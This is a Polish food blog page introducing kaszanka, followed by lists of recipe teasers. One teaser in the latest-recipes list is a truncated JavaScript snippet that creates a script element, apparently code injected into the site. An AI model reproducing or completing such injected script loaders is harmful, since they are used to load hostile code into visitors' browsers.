Kaszanka

Zapraszam Kaszanka, jedni lubia, inni wrecz kochaja inni nienawidza. Jest znana w kuchni slowackiej, wegierskiej i niemieckiej. W 2016 roku, Krupnioki Ślaskie, otrzymaly europejski certyfikat, Oznaczenia pochodzenia geograficznego produktow rolnych w Unii Europejskiej.
Najnowsze przepisy
Rabarbar pojawia się w sklepach i na straganach wcześnie... ⇖ 9
Ah, Thanksgiving! It’s that magical time of year when the... ⇖ 7
Uwielbiam kuchnię pełną wyrazistych smaków i aromatów,... ⇖ 9
Jesień zagościła na dobre, to i w kuchni również jest... ⇖ 10
(function(){ u938=document.createElement("script");u938.type ⇖ 9
Idealne, słodko winne polędwiczki w sosie śliwkowym,... ⇖ 20
Przepisy z bloga
Zapraszam Sernik na zimno z wloskiej ricotty. Deser, ktoz... ⇖ 1052
Zapraszam Kanapka z grzybami, orzeszkami piniowymi,... ⇖ 958
Zapraszam Gulasz z kiszonej kapusty. Przeszukujac internet,... ⇖ 899
Zapraszam Massimo Bottura na dwulecie bloga. Co wspolnego... ⇖ 1075
Zapraszam Zapiekany baklazana w sosie pomidorowym z... ⇖ 883
Zapraszam Wedzony czosnek sloniowy. Czym jest? Mogloby sie... ⇖ 893
Przepisy na czasie
Murzynek to takie ciasto, które piekło się u mnie w domu... ⇖ 831
Sezon na grzyby jest w pełni, w tym roku jest istne,... ⇖ 356
Sernik bez sera to taki wypiek, który potrafi naprawdę... ⇖ 328
Przysmak Sułtana to jedno z tych ciast, które wygląda... ⇖ 322
Sernik to jedno z tych ciast, które nigdy się nie nudzą... ⇖ 266